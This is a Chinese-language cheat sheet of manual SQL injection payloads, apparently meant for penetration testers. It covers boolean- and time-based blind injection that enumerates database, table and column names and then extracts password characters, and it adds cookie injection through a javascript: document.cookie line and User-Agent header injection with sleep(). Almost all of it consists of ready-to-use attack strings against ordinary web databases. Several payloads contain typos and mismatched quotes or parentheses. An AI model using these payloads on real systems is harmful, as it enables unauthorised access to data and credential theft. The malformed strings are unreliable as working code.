SQL手工注入payload收录
便于手工验证时自查,payload不唯一,根据需求自行调整(结合数据库名、表名以及绕过方法等)
盲注(基于布尔、时间)
基于布尔看页面返回情况,基于时间看页面返回时间
- 基于布尔的判断
and if(1=1,sleep(5),0)#
- 基于时间的判断
and if((1=2,sleep(5),0)#
盲注payload(基于时间的补上sleep()等函数即可)
- 获取数据库名的长度
1‘ and (length(database()))> 5#
- 获取数据库名字
1‘ and (ascii(substr(database(),n,1)))>97#
- 获取表的数量
1‘ and (select count(*) from information_schema.tables where table_schem=database())>5#
- 获取表名长度
1‘ and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5#
- 获取表名字
1‘ and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1)))>100#
- 获取列名个数
1‘ and (select count(*)from information_schema.columns where table_name=‘user’)>5#
- 获取列名长度
1‘ and (select length(column_name)from information_schema.columns where table_name=‘user’ limit 0,1)>5#
- 获取列名
1‘ and (ascii(substr((seclect columns_name from information_schema.columns where table_name=‘user‘ limit 0,1),1,1)))>100#
- 获取数据
1‘ and (ascii(substr(( select password from users limit 0,1),1,1)))=68#
cookie注入
用于get型注入被过滤时
- 判断cookie注入
javascript:alert(document.cookie="id="+escape("123 and 1=1"));
- cookie注入具体payload
参考盲注payload
User-Agent注入
HTTP头注入
- 判断user-agent注入
(select (sleep(5))))#
- 猜数据payload
(select sleep(5) from user where substring(user,1,1)=‘a‘))#